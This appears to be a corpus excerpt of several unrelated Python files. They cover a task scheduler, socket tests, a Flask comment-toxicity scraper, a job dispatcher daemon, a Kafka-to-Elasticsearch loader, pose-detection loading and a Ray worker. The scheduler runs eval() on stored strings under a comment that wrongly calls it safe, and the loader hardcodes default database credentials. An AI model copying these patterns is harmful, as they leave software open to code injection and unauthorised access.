name=task['name'],
func=task['func'],
hook=task.get('hook'),
args=task['args'],
kwargs=task['kwargs'],
started=task['started'],
stopped=task['stopped'],
result=task['result'],
group=task.get('group'),
success=task['success']
)
except Exception as e:
logger.error(e)
def save_cached(task, broker):
task_key = '{}:{}'.format(broker.list_key, task['id'])
timeout = task['cached']
if timeout is True:
timeout = None
try:
group = task.get('group', None)
iter_count = task.get('iter_count', 0)
# if it's a group append to the group list
if group:
group_key = '{}:{}:keys'.format(broker.list_key, group)
group_list = broker.cache.get(group_key) or []
# if it's an iter group, check if we are ready
if iter_count and len(group_list) == iter_count - 1:
group_args = '{}:{}:args'.format(broker.list_key, group)
# collate the results into a Task result
results = [SignedPackage.loads(broker.cache.get(k))['result'] for k in group_list]
results.append(task['result'])
task['result'] = results
task['id'] = group
task['args'] = SignedPackage.loads(broker.cache.get(group_args))
task.pop('iter_count', None)
task.pop('group', None)
if task.get('iter_cached', None):
task['cached'] = task.pop('iter_cached', None)
save_cached(task, broker=broker)
else:
save_task(task, broker)
broker.cache.delete_many(group_list)
broker.cache.delete_many([group_key, group_args])
return
# save the group list
group_list.append(task_key)
broker.cache.set(group_key, group_list, timeout)
# async next in a chain
if task.get('chain', None):
tasks.async_chain(task['chain'], group=group, cached=task['cached'], sync=task['sync'], broker=broker)
# save the task
broker.cache.set(task_key,
SignedPackage.dumps(task),
timeout)
except Exception as e:
logger.error(e)
def scheduler(broker=None):
"""
Creates a task from a schedule at the scheduled time and schedules next run
"""
if not broker:
broker = get_broker()
db.close_old_connections()
try:
for s in Schedule.objects.exclude(repeats=0).filter(next_run__lt=timezone.now()):
args = ()
kwargs = {}
# get args, kwargs and hook
if s.kwargs:
try:
# eval should be safe here because dict()
kwargs = eval('dict({})'.format(s.kwargs))
except SyntaxError:
kwargs = {}
if s.args:
args = ast.literal_eval(s.args)
# single value won't eval to tuple, so:
if type(args) != tuple:
args = (args,)
q_options = kwargs.get('q_options', {})
if s.hook:
q_options['hook'] = s.hook
# set up the next run time
if not s.schedule_type == s.ONCE:
next_run = arrow.get(s.next_run)
while True:
if s.schedule_type == s.MINUTES:
next_run = next_run.replace(minutes=+(s.minutes or 1))
elif s.schedule_type == s.HOURLY:
next_run = next_run.replace(hours=+1)
elif s.schedule_type == s.DAILY:
next_run = next_run.replace(days=+1)
elif s.schedule_type == s.WEEKLY:
next_run = next_run.replace(weeks=+1)
elif s.schedule_type == s.MONTHLY:
next_run = next_run.replace(months=+1)
elif s.schedule_type == s.QUARTERLY:
next_run = next_run.replace(months=+3)
elif s.schedule_type == s.YEARLY:
next_run = next_run.replace(years=+1)
if Conf.CATCH_UP or next_run > arrow.utcnow():
break
s.next_run = next_run.datetime
s.repeats += -1
# send it to the cluster
q_options['broker'] = broker
q_options['group'] = q_options.get('group', s.name or s.id)
kwargs['q_options'] = q_options
s.task = tasks.async(s.func, *args, **kwargs)
# log it
if not s.task:
logger.error(
_('{} failed to create a task from schedule [{}]').format(current_process().name,
s.name or s.id))
else:
logger.info(
_('{} created a task from schedule [{}]').format(current_process().name, s.name or s.id))
# default behavior is to delete a ONCE schedule
if s.schedule_type == s.ONCE:
if s.repeats < 0:
s.delete()
continue
# but not if it has a positive repeats
s.repeats = 0
# save the schedule
s.save()
except Exception as e:
logger.error(e)
def set_cpu_affinity(n, process_ids, actual=not Conf.TESTING):
"""
Sets the cpu affinity for the supplied processes.
Requires the optional psutil module.
:param int n: affinity
:param list process_ids: a list of pids
:param bool actual: Test workaround for Travis not supporting cpu affinity
"""
# check if we have the psutil module
if not psutil:
logger.warning('Skipping cpu affinity because psutil was not found.')
return
# check if the platform supports cpu_affinity
if actual and not hasattr(psutil.Process(process_ids[0]), 'cpu_affinity'):
logger.warning('Faking cpu affinity because it is not supported on this platform')
actual = False
# get the available processors
cpu_list = list(range(psutil.cpu_count()))
# affinities of 0 or gte cpu_count, equals to no affinity
if not n or n >= len(cpu_list):
return
# spread the workers over the available processors.
index = 0
for pid in process_ids:
affinity = []
for k in range(n):
if index == len(cpu_list):
index = 0
affinity.append(cpu_list[index])
index += 1
if psutil.pid_exists(pid):
p = psutil.Process(pid)
if actual:
p.cpu_affinity(affinity)
logger.info(_('{} will use cpu {}').format(pid, affinity))
|
test_io.py
|
import unittest
import socket
import threading
import time
import random
from ppctools.network import PPCToolsConnection
CONNECTINFO = ('localhost', random.randint(1024, 4096))
TOKEN = 'supersecrettoken13987kjc131'
NUMBER1 = 134124
def handle_connection(request):
request.sendall(b'Welcome! Please check 2 + 2 = 4 ')
request.recv(1024)
request.sendall(b'Token: ')
request.recv(1024)
request.sendall(b'Ok. Let\'s play!\n')
time.sleep(0.5)
request.sendall(b'Give me a number: ')
number = int(request.recv(1024).decode())
request.sendall(f'Hmm {number + 10} is it number + 10? '.encode())
request.recv(1024)
request.sendall(b'Bye!\n')
def run_server():
s = socket.socket()
s.bind(CONNECTINFO)
s.listen(1)
r, addr = s.accept()
del addr
handle_connection(r)
r.close()
s.close()
class TestConnectionClass(unittest.TestCase):
def setUp(self):
threading.Thread(target=run_server, daemon=True).start()
time.sleep(1) # Wait for server activate
def test_connection(self):
print('\n---------- connect dialog begin ----------\n')
conn = PPCToolsConnection(*CONNECTINFO)
args = conn.read().split()[3:]
self.assertEqual(int(args[0]) + int(args[2]), int(args[4]))
conn.send('Ok')
self.assertEqual(conn.read(), 'Token: ')
conn.send(TOKEN)
conn.read(2)
conn.send(NUMBER1)
num = int(conn.read().split()[1])
self.assertEqual(num, NUMBER1 + 10)
conn.send('yes')
conn.read()
print('\n---------- connect dialog end ----------')
|
app.py
|
from flask import Flask, request, render_template, Response
from flask import make_response, jsonify
import sys
import os
import requests
import json
import threading
import time
import pandas as pd
import tempfile
import datetime
from collections import defaultdict
import namegenerator
sys.path.append(os.path.abspath("./"))
from apollo.Scraper.config import (
USER_AGENT,
YOUTUBE_VIDEO_URL,
)
if not(os.path.isdir(os.path.join('./', 'downloads'))):
os.mkdir(os.path.join('./', 'downloads'))
from apollo.Scraper.LinkParser import extract_id
from apollo.inference.inference import inference_v2, load_model
from apollo.Scraper.download_comments import download_comments
app = Flask(__name__)
app.secret_key = os.urandom(24)
LOAD_MODEL_THREAD = None
chart_data = [0, 0]
log_data = ''
DATA_STORE = defaultdict(list)
COMMENTS_STORE = []
@app.after_request
def add_header(response):
"""
Add headers to both force latest IE rendering engine or Chrome Frame,
and also to cache the rendered page for 10 minutes.
"""
response.headers["X-UA-Compatible"] = "IE=Edge,chrome=1"
response.headers["Cache-Control"] = "public, max-age=0"
return response
def scrapper_v2(youtube_id, sensitivity, limit):
'''
Code modified from : https://github.com/egbertbouman/youtube-comment-downloader
:param youtube_id: ID of Youtube Video Link
:param sensitivity: Sensitivity tolerance level (To be used as threshold during inference)
:param limit: Number of comments to be scraped
:return: CSV file of output comments
'''
try:
# if LOAD_MODEL_THREAD is not None:
LOAD_MODEL_THREAD.join()
global chart_data
global log_data
global DATA_STORE
filename = '{}_{}_{}.csv'.format(youtube_id, sensitivity, limit)
chart_data = [0, 0]
log_data = ''
df = pd.DataFrame(columns=['id', 'comment', 'score', 'sensitivity'])
toxic_count, nontoxic_count = 0 , 0
count_list = []
comment_list = []
score_list = []
sensitivity_list = []
if not youtube_id:
log_data = 'error'
chart_data = [0, 0]
raise ValueError("you need to specify a Youtube ID")
print("Downloading Youtube comments for video:", youtube_id)
count = 0
session = requests.Session()
session.headers["User-Agent"] = USER_AGENT
response = session.get(YOUTUBE_VIDEO_URL.format(youtube_id=youtube_id))
html = response.text
if "og:title" in html:
for comment in download_comments(youtube_id):
comment_content = comment['content']
score = inference_v2(comment_content, sensitivity)
count += 1
count_list.append(count)
comment_list.append(comment_content)
score_list.append(score)
sensitivity_list.append(sensitivity)
if score > (sensitivity):
toxic_count += 1
else:
nontoxic_count +=1
chart_data = [toxic_count, nontoxic_count]
# comment['author']
author_dummy_name = namegenerator.gen()
extra_log_data = [comment['content'], comment['time'], author_dummy_name, comment['votes'], comment['photo'], str(score)]
if limit and count >= limit:
DATA_STORE[youtube_id].append({'chart_data':chart_data, 'extra_log_data': extra_log_data, 'task_finished': True, 'success': True, 'index': count, 'filename': filename})
df['id'], df['comment'], df['score'], df['sensitivity'] = count_list, comment_list, score_list, sensitivity_list
LOG_RESULT_DATA = filename
# filepath = os.path.abspath(os.path.join('./', 'downloads', filename))
filepath = os.path.abspath(os.path.join('./apollo/Frontend/static', filename))
df.to_csv(filepath, encoding='utf-8')
break
else:
DATA_STORE[youtube_id].append({'chart_data':chart_data, 'extra_log_data': extra_log_data, 'task_finished': False, 'success': True, 'index': count, 'filename': filename})
print(comment_content, toxic_count, nontoxic_count, score)
sys.stdout.write("Downloaded %d comment(s)\r" % count)
sys.stdout.flush()
print("\nDone!")
else:
print(f"The provided YouTube ID : {youtube_id} is invalid! ")
DATA_STORE[youtube_id].append({'chart_data':[], 'extra_log_data': [], 'task_finished': True, 'success': False, 'index': -1, 'filename': ''})
log_data = 'error'
chart_data = [0, 0]
except Exception as e:
print("Error:", str(e))
sys.exit(1)
@app.route('/chart-data', methods=['GET'])
def chart_data():
if request.method == 'GET':
url = request.args.get('url')
youtube_id = extract_id(url)
def send_data(youtube_id):
while len(DATA_STORE[youtube_id])>0:
json_data = json.dumps(DATA_STORE[youtube_id].pop(0))
yield f"data:{json_data}\n\n"
time.sleep(1)
return Response(send_data(youtube_id), mimetype='text/event-stream')
@app.route("/about.html")
def about():
return render_template("about.html")
@app.route("/index.html")
def home_index():
response = make_response(render_template("index.html"))
response = add_header(response)
return response
@app.route("/")
def home():
global LOAD_MODEL_THREAD
LOAD_MODEL_THREAD = threading.Thread(target=load_model, args=())
LOAD_MODEL_THREAD.daemon = True
LOAD_MODEL_THREAD.start()
response = make_response(render_template("index.html"))
response = add_header(response)
return response
@app.route('/predict',methods=['GET', 'POST'])
def predict():
print('STARTING PREDICTION*********************')
'''
For rendering results on HTML GUI
'''
global COMPLETED
global LIMIT
COMPLETED = False
COMMENT_URL = [x for x in request.form.values()]
if len(COMMENT_URL[0]) == 0:
return jsonify(msg='URL missing', status='error')
COMMENT_LINK = extract_id(COMMENT_URL[0])
SENSITIVITY = float(COMMENT_URL[1])
LIMIT = int(COMMENT_URL[2])
if COMMENT_LINK is None:
print("Invalid link or the link is not supported yet.")
'''
Add a function to show the error message in html page
'''
return render_template('index.html',name ='')
else:
print (COMMENT_LINK)
scrapper_v2(COMMENT_LINK, SENSITIVITY, LIMIT)
return jsonify(msg='scraping successfully', status='success')
if __name__ == "__main__":
app.run(debug=True, threaded=True)
|
server.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# /*******************************************************
# * Copyright (C) 2013-2014 CloudRunner.io <info@cloudrunner.io>
# *
# * Proprietary and confidential
# * This file is part of CloudRunner Server.
# *
# * CloudRunner Server can not be copied and/or distributed
# * without the express permission of CloudRunner.io
# *******************************************************/
try:
import argcomplete
except ImportError:
pass
import argparse
import logging
import os
import signal
import threading
from cloudrunner import CONFIG_LOCATION
from cloudrunner import LOG_LOCATION
from cloudrunner.util.config import Config
from cloudrunner.util.logconfig import configure_loggers
CONFIG = Config(CONFIG_LOCATION)
if CONFIG.verbose_level:
configure_loggers(getattr(logging, CONFIG.verbose_level, 'INFO'),
LOG_LOCATION)
else:
configure_loggers(logging.DEBUG if CONFIG.verbose else logging.INFO,
LOG_LOCATION)
from cloudrunner.core.exceptions import ConnectionError
from cloudrunner.plugins.args_provider import ManagedPlugin
from cloudrunner.util.daemon import Daemon
from cloudrunner.util.loader import load_plugins, local_plugin_loader
from cloudrunner.util.shell import colors
from cloudrunner_server.core.message import (M, Dispatch, GetNodes, Nodes,
Error, Queued)
from cloudrunner_server.dispatcher import (TaskQueue)
from cloudrunner_server.dispatcher.admin import Admin
from cloudrunner_server.dispatcher.manager import SessionManager
from cloudrunner_server.plugins import PLUGIN_BASES
from cloudrunner_server.plugins.logs.base import LoggerPluginBase
LOG = logging.getLogger("Dispatcher")
class Dispatcher(Daemon):
"""
Main dispatcher. Receives requests from clients
and runs them on the specified nodes
"""
def __init__(self, *_args, **kwargs):
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('-p', '--pidfile', dest='pidfile',
help='Daemonize process with the '
'given pid file')
arg_parser.add_argument('-c', '--config', help='Config file')
arg_parser.add_argument(
'action',
choices=[
'start', 'stop', 'restart', 'run'],
help='Apply action on the daemonized process\n'
'For the actions [start, stop, restart] - pass a pid file\n'
'Run - start process in debug mode\n')
try:
argcomplete.autocomplete(arg_parser)
except:
pass
if _args:
self.args = arg_parser.parse_args(_args)
else:
self.args = arg_parser.parse_args()
if self.args.pidfile:
super(Dispatcher, self).__init__(self.args.pidfile,
stdout='/tmp/log')
elif self.args.action in ['start', 'stop', 'restart']:
print colors.red("The --pidfile option is required"
" with [start, stop, restart] commands",
bold=1)
exit(1)
global CONFIG
if 'config' in kwargs:
CONFIG = kwargs['config']
elif self.args.config:
CONFIG = Config(self.args.config)
def init_libs(self):
# instantiate dispatcher implementation
self.transport_class = local_plugin_loader(CONFIG.transport)
if not self.transport_class:
LOG.fatal('Cannot find transport class. Set it in config file.')
exit(1)
self.loaded_plugins = load_plugins(CONFIG, bases=PLUGIN_BASES)
args_plugins = argparse.ArgumentParser(add_help=False)
args_plugins.add_argument('-t', '--timeout', help="Timeout")
self.plugin_register = {}
for plugin_classes in self.loaded_plugins.values():
for plugin in plugin_classes:
if issubclass(plugin, ManagedPlugin):
try:
plugin.start(CONFIG)
except Exception, ex:
LOG.error('Plugin error(%s): %r' % (plugin, ex))
self.logger_klass = None
if LoggerPluginBase.__subclasses__():
self.logger_klass = LoggerPluginBase.__subclasses__()[0]
else:
if not CONFIG.logger:
LOG.warn('No Logger plugin found')
else:
self.logger_klass = local_plugin_loader(CONFIG.logger)
self.config = CONFIG
self.logger = None
if self.logger_klass:
self.logger = self.logger_klass(self.config)
self.logger.set_context_from_config()
LOG.info("Using %s.%s for Logger backend" % (
self.logger_klass.__module__,
self.logger_klass.__name__))
def list_active_nodes(self, org):
msg = Nodes()
if hasattr(self, 'backend'):
tenant = self.backend.tenants.get(org, None)
if tenant:
msg.nodes = [dict(name=n.name,
last_seen=int(n.last_seen),
usage=n.usage)
for n in tenant.active_nodes()]
return msg
return msg
"""
def attach(self, payload, remote_user_map, **kwargs):
'''
Attach to an existing pre-defined session
or create it if not started yet
'''
(targets, req_args) = parser.parse_selectors(payload)
queue = TaskQueue()
queue.targets = targets
return queue
def detach(self, payload, remote_user_map, **kwargs):
'''
Detach from an existing pre-defined session
'''
queue = TaskQueue()
queue.remove = True
return queue
"""
def notify(self, payload, remote_user_map, **kwargs):
session_id = str(kwargs.pop('session_id'))
job_id = str(kwargs.pop('job_id'))
targets = str(kwargs.pop('targets', '*'))
session = [sess for sess in self.manager.subscriptions.get(
session_id, []) if sess.owner == self.user_id]
if not session:
return [False, "You are not the owner of the session"]
job_queue = self.manager.backend.publish_queue('user_input')
job_queue.send(job_id, '', 'INPUT', session_id, self.user_id,
str(remote_user_map.org), payload, targets)
return [True, "Notified"]
def term(self, payload, remote_user_map, **kwargs):
session_id = str(kwargs.pop('session_id'))
session_sub = [sess for sess in self.manager.subscriptions.get(
session_id, []) if sess.owner == self.user_id]
if not session_sub:
return [False, "You are not the owner of the session"]
session = self.manager.sessions.get(session_id)
if session:
session.stop_reason = str(kwargs.get('action', 'term'))
session.session_event.set()
return [True, "Session terminated"]
else:
return [False, "Session not found"]
def dispatch(self, user, task_id, tasks, remote_user_map, env=None,
disabled_nodes=None):
"""
Dispatch script to targeted nodes
"""
queue = self.manager.prepare_session(
self.user_id, task_id, tasks, remote_user_map, env=env,
disabled_nodes=disabled_nodes)
return queue
def worker(self, *args):
job_queue = self.backend.consume_queue('requests')
while not self.stopping.is_set():
try:
raw_frames = None
try:
raw_frames = job_queue.recv(timeout=500)
if not raw_frames:
continue
except ConnectionError:
break
except Exception, ex:
LOG.exception(ex)
if not self.stopping.is_set():
continue
# User -> queue
sender = ''
ident = raw_frames.pop(0)
pack = raw_frames.pop(0)
msg = M.build(pack)
if msg.control == 'QUIT':
# Node exited
continue
if not msg:
LOG.error("Invalid request %s" % raw_frames)
continue
if isinstance(msg, Dispatch):
self.user_id = msg.user
remote_user_map = msg.roles
disabled_nodes = msg.disabled_nodes or []
LOG.info('user: %s/%s' % (msg.user,
remote_user_map['org']))
response = self.dispatch(msg.user, msg.task_id,
msg.tasks, msg.roles,
env=getattr(msg, 'env', {}),
disabled_nodes=disabled_nodes)
elif isinstance(msg, GetNodes):
response = self.list_active_nodes(msg.org)
else:
# TODO: Check if a plugin supports command
job_queue.send(sender, Error(msg="Unknown command"))
continue
if isinstance(response, TaskQueue):
# Return job id
job_queue.send([ident,
Queued(task_ids=response.task_ids)._])
response.process()
elif isinstance(response, M):
job_queue.send(ident, response._)
except ConnectionError:
break
job_queue.close()
LOG.info('Server worker exited')
def logger_worker(self, *args):
log_queue = self.backend.consume_queue('logger')
while not self.stopping.is_set():
try:
frames = log_queue.recv(timeout=500)
if not frames:
continue
try:
self.logger.log(M.build(frames[0]))
except Exception, err:
LOG.exception(err)
except ConnectionError:
break
except Exception, err:
LOG.exception(err)
continue
log_queue.close()
LOG.info('Logger worker exited')
def choose(self):
getattr(self, self.args.action)()
def run(self):
self.init_libs()
if not self.config.sock_dir:
raise Exception("Socket dir (sock_dir) is not set in config")
if not os.path.exists(self.config.sock_dir):
try:
os.makedirs(self.config.sock_dir)
except:
raise Exception("Socket dir doesn't exist and "
"cannot be created")
WORKER_COUNT = int(CONFIG.workers_count or 10)
LOG_WORKER_COUNT = int(CONFIG.log_worker_count or 3)
self.stopping = threading.Event()
self.backend = self.transport_class(self.config)
self.backend.set_context_from_config()
self.backend.prepare()
self.admin = Admin(self.config, self.backend)
self.admin.set_context_from_config()
self.admin.start()
self.manager = SessionManager(self.config, self.backend)
self.manager.set_context_from_config()
self.threads = []
for i in range(WORKER_COUNT):
thread = threading.Thread(target=self.worker, args=[])
thread.start()
self.threads.append(thread)
self.logger_threads = []
if self.logger:
for i in range(LOG_WORKER_COUNT):
thread = threading.Thread(target=self.logger_worker, args=[])
thread.start()
self.logger_threads.append(thread)
signal.signal(signal.SIGINT, self._handle_terminate)
signal.signal(signal.SIGTERM, self._handle_terminate)
self.backend.loop()
LOG.info('Exited main thread')
def _handle_terminate(self, *args):
LOG.info("Received terminate signal")
self.backend.terminate()
self.manager.stop()
self.stopping.set()
for thread in self.threads:
thread.join()
for logger_thread in self.logger_threads:
logger_thread.join()
LOG.info('Threads exited')
# Destroy managed plugins
for plugin_base in PLUGIN_BASES:
for plugin in plugin_base.__subclasses__():
if issubclass(plugin, ManagedPlugin):
try:
plugin.stop()
except:
pass
LOG.info('Stopped Server daemon')
def main():
Dispatcher().choose()
if __name__ == '__main__':
main()
|
kafka_to_elastic.py
|
import time
import requests
import threading
import gc
from threading import Thread, BoundedSemaphore
from elasticsearch import Elasticsearch
from kafka import KafkaConsumer, KafkaProducer
import sys
args = sys.argv
threads=[]
pull_data=[]
def pulldt(pull_num,es):
global pull_data
while True:
try:
value=pull_data[int(pull_num)][0]
pull_data[int(pull_num)].pop(0)
value=value.rsplit(",")
doc = {'received':str(value[1]),'sendtime':str(value[2]),'monitor':"alive",'minimum':str(value[3]),'jitter':str(value[4]),'serial':str(value[5]),'vxlanid':str(value[6])}
tmp = es.index(index=value[0], doc_type='type1', body=doc)
except:
continue
def main():
global threads
global pull_data
start_time=int(time.time())*1000
consumer = KafkaConsumer(bootstrap_servers="<elastic_ip>:9092",auto_offset_reset="earliest",group_id="main",enable_auto_commit=True)
consumer.subscribe(['oam-cc-data'+str(args[1])])
for i in range(100):
pull_data.append([])
es = Elasticsearch(['<elastic_ip>'],http_auth=('elastic', 'changeme'),port=9200,timeout=999999999)
thread_data=threading.Thread(target=pulldt,args=(str(i),es),name="a"+str(i))
thread_data.start()
num = 0
while True:
for message in consumer:
if message.timestamp >= start_time:
pull_data[int(num)].append(message.value)
num=num+1
if num == 100:
num = 0
if __name__ == '__main__':
main()
|
file_detector.py
|
from itertools import count
from os import read
from threading import Thread
from queue import Queue
import json
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.read_img import read_img
from alphapose.utils.presets import SimpleTransform
class FileDetectionLoader():
def __init__(self, input_source, cfg, opt, queueSize=128):
self.cfg = cfg
self.opt = opt
self.bbox_file = input_source
self._input_size = cfg.DATA_PRESET.IMAGE_SIZE
self._output_size = cfg.DATA_PRESET.HEATMAP_SIZE
self._sigma = cfg.DATA_PRESET.SIGMA
if cfg.DATA_PRESET.TYPE == 'simple':
self.transformation = SimpleTransform(
self, scale_factor=0,
input_size=self._input_size,
output_size=self._output_size,
rot=0, sigma=self._sigma,
train=False, add_dpg=False)
# initialize the det file list
boxes = None
if isinstance(self.bbox_file,list):
boxes = self.bbox_file
else:
with open(self.bbox_file, 'r') as f:
boxes = json.load(f)
assert boxes is not None, 'Load %s fail!' % self.bbox_file
self.all_imgs = []
self.all_boxes = {}
self.all_scores = {}
self.all_ids = {}
num_boxes = 0
for k_img in range(0, len(boxes)):
det_res = boxes[k_img]
img_name = det_res['image_id']
if img_name not in self.all_imgs:
self.all_imgs.append(img_name)
self.all_boxes[img_name] = []
self.all_scores[img_name] = []
self.all_ids[img_name] = []
x1, y1, w, h = det_res['bbox']
bbox = [x1, y1, x1 + w, y1 + h]
score = det_res['score']
self.all_boxes[img_name].append(bbox)
self.all_scores[img_name].append(score)
if 'idx' in det_res.keys():
self.all_ids[img_name].append(int(det_res['idx']))
else:
self.all_ids[img_name].append(0)
# initialize the queue used to store data
"""
pose_queue: the buffer storing post-processed cropped human image for pose estimation
"""
if opt.sp:
self._stopped = False
self.pose_queue = Queue(maxsize=queueSize)
else:
self._stopped = mp.Value('b', False)
self.pose_queue = mp.Queue(maxsize=queueSize)
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to pre process images for object detection
image_preprocess_worker = self.start_worker(self.get_detection)
return [image_preprocess_worker]
def stop(self):
# clear queues
self.clear_queues()
def terminate(self):
if self.opt.sp:
self._stopped = True
else:
self._stopped.value = True
self.stop()
def clear_queues(self):
self.clear(self.pose_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def wait_and_put(self, queue, item):
if not self.stopped:
queue.put(item)
def wait_and_get(self, queue):
if not self.stopped:
return queue.get()
def get_detection(self):
for im_name_k in self.all_imgs:
boxes = torch.from_numpy(np.array(self.all_boxes[im_name_k]))
scores = torch.from_numpy(np.array(self.all_scores[im_name_k]))
ids = torch.from_numpy(np.array(self.all_ids[im_name_k]))
orig_img_k = read_img(im_name_k)
inps = torch.zeros(boxes.size(0), 3, *self._input_size)
cropped_boxes = torch.zeros(boxes.size(0), 4)
for i, box in enumerate(boxes):
inps[i], cropped_box = self.transformation.test_transform(orig_img_k, box)
cropped_boxes[i] = torch.FloatTensor(cropped_box)
self.wait_and_put(self.pose_queue, (inps, orig_img_k, im_name_k, boxes, scores, ids, cropped_boxes))
self.wait_and_put(self.pose_queue, (None, None, None, None, None, None, None))
return
def read(self):
return self.wait_and_get(self.pose_queue)
@property
def stopped(self):
if self.opt.sp:
return self._stopped
else:
return self._stopped.value
@property
def length(self):
return len(self.all_imgs)
@property
def joint_pairs(self):
"""Joint pairs which defines the pairs of joint to be swapped
when the image is flipped horizontally."""
return [[1, 2], [3, 4], [5, 6], [7, 8],
[9, 10], [11, 12], [13, 14], [15, 16]]
|
test_start.py
|
import sys
import os
import time
import subprocess
sys.path.append(os.path.normpath("../../main/python/"))
from daemon_launcher import daemon_launcher
from multiprocessing import Process
print(os.path.abspath(os.curdir))
subprocess.call("./initrepo.sh")
# Make sure the daemon isn't running when we start
if daemon_launcher.daemon_is_running():
daemon_launcher.stop_daemon()
# Start the daemon and wait for this action to finish
p = Process(target=daemon_launcher.start_daemon)
p.start()
p.join()
time.sleep(1)
# check that the daemon is running.
assert(daemon_launcher.daemon_is_running())
# check that the log files exist.
assert(os.path.isfile('/tmp/gitup/daemon.out'))
assert(os.path.isfile('/tmp/gitup/daemon.err'))
# stop the daemon
daemon_launcher.stop_daemon()
print('passed')
exit(0)
|
Database.py
|
import utils
import threading
from time import sleep
UPDATE_FIFO = 0.05
UPDATE_BUFFER = 0.2
AUTO_SAVE = 20
class Database:
def __init__(self, database_file, check_dup = True):
self.buffer = []
self.buffered_fifo = []
self.fifo = []
self.database_file = database_file
self.chk_du = check_dup
self._get_data_from_file()
self.lock = threading.Lock()
self.fifo_updater = threading.Thread(target=self._get_fifo)
self.buffer_updater = threading.Thread(target=self._update_buffer)
self.auto_saver = threading.Thread(target=self._flush_data)
#self.fifo_updater = Process(target=self._get_fifo)
#self.buffer_updater = Process(target=self._update_buffer)
#self.auto_saver = Process(target=self._flush_data)
self.fifo_updater.start()
self.buffer_updater.start()
self.auto_saver.start()
def get_index(self, index):
return self.buffer[index]
def append_data(self, data):
self.fifo = data
def get_length(self):
return len(self.buffer)
def clear(self):
self.buffer = []
self.fifo = []
self.buffered_fifo = []
with open(self.database_file,"w") as db_file:
db_file.write("")
def _get_fifo(self):
while True:
for i in range(len(self.fifo)):
self.buffered_fifo.append(self.fifo[i])
self.fifo = []
sleep(UPDATE_FIFO)
def _update_buffer(self):
while True:
self.lock.acquire()
for i in range(len(self.buffered_fifo)):
for j in range(len(self.buffer)):
#existing = self.buffer[j][:-1].split("//")[1]
#new = data[i].split("//")[1]
existing = self.buffer[j]; new = self.buffered_fifo[i]
if (existing == new):
unique = False
break
else:
unique = True
if len(self.buffer) == 0:
unique = True
if unique:
self.buffer.append(self.buffered_fifo[i])
self.lock.release()
sleep(UPDATE_BUFFER)
def _get_data_from_file(self):
self.buffer = []
with open(self.database_file,encoding="utf-8") as db_file:
for line in db_file:
self.buffer.append(line[:-1])
def _flush_data(self):
while True:
if self.buffer != "":
print("AUTOSAVE")
with open(self.database_file,"w",encoding="utf-8") as db_file:
db_file.write(utils.list_to_str(self.buffer))
sleep(AUTO_SAVE)
if __name__ == '__main__':
db = Database("test.db")
db.clear()
db.append_data(["1","2","3"])
sleep(1)
print(db.get_index(2))
print(db.get_length())
|
worker.py
|
from contextlib import contextmanager
import atexit
import faulthandler
import hashlib
import inspect
import io
import json
import logging
import os
import redis
import sys
import threading
import time
import traceback
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple, Union
# Ray modules
from ray.autoscaler._private.constants import AUTOSCALER_EVENTS
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.cloudpickle as pickle
import ray._private.memory_monitor as memory_monitor
import ray.node
import ray.job_config
import ray._private.parameter
import ray.ray_constants as ray_constants
import ray.remote_function
import ray.serialization as serialization
import ray._private.gcs_utils as gcs_utils
import ray._private.services as services
from ray._private.runtime_env import working_dir as working_dir_pkg
import ray._private.import_thread as import_thread
from ray.util.tracing.tracing_helper import import_from_string
from ray.util.annotations import PublicAPI, DeveloperAPI, Deprecated
from ray.util.debug import log_once
import ray
import colorama
import setproctitle
import ray.state
from ray import (
ActorID,
JobID,
ObjectRef,
Language,
)
import ray._private.profiling as profiling
from ray.exceptions import (
RaySystemError,
RayError,
RayTaskError,
ObjectStoreFullError,
)
from ray._private.function_manager import FunctionActorManager
from ray._private.ray_logging import setup_logger
from ray._private.ray_logging import global_worker_stdstream_dispatcher
from ray._private.utils import check_oversized_function
from ray.util.inspect import is_cython
from ray.experimental.internal_kv import _internal_kv_get, \
_internal_kv_initialized
from ray._private.client_mode_hook import client_mode_hook
SCRIPT_MODE = 0
WORKER_MODE = 1
LOCAL_MODE = 2
SPILL_WORKER_MODE = 3
RESTORE_WORKER_MODE = 4
ERROR_KEY_PREFIX = b"Error:"
# Logger for this module. It should be configured at the entry point
# into the program using Ray. Ray provides a default configuration at
# entry/init points.
logger = logging.getLogger(__name__)
# Visible for testing.
def _unhandled_error_handler(e: Exception):
logger.error("Unhandled error (suppress with "
"RAY_IGNORE_UNHANDLED_ERRORS=1): {}".format(e))
class Worker:
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
node (ray.node.Node): The node this worker is attached to.
mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE, and
WORKER_MODE.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
"""
def __init__(self):
"""Initialize a Worker object."""
self.node = None
self.mode = None
self.cached_functions_to_run = []
self.actors = {}
# When the worker is constructed. Record the original value of the
# CUDA_VISIBLE_DEVICES environment variable.
self.original_gpu_ids = ray._private.utils.get_cuda_visible_devices()
self.memory_monitor = memory_monitor.MemoryMonitor()
# A dictionary that maps from driver id to SerializationContext
# TODO: clean up the SerializationContext once the job finished.
self.serialization_context_map = {}
self.function_actor_manager = FunctionActorManager(self)
# This event is checked regularly by all of the threads so that they
# know when to exit.
self.threads_stopped = threading.Event()
# Index of the current session. This number will
# increment every time when `ray.shutdown` is called.
self._session_index = 0
# If this is set, the next .remote call should drop into the
# debugger, at the specified breakpoint ID.
self.debugger_breakpoint = b""
# If this is set, ray.get calls invoked on the object ID returned
# by the worker should drop into the debugger at the specified
# breakpoint ID.
self.debugger_get_breakpoint = b""
# If True, make the debugger external to the node this worker is
# running on.
self.ray_debugger_external = False
self._load_code_from_local = False
# Used to toggle whether or not logs should be filtered to only those
# produced in the same job.
self.filter_logs_by_job = True
@property
def connected(self):
"""bool: True if Ray has been started and False otherwise."""
return self.node is not None
@property
def node_ip_address(self):
self.check_connected()
return self.node.node_ip_address
@property
def load_code_from_local(self):
self.check_connected()
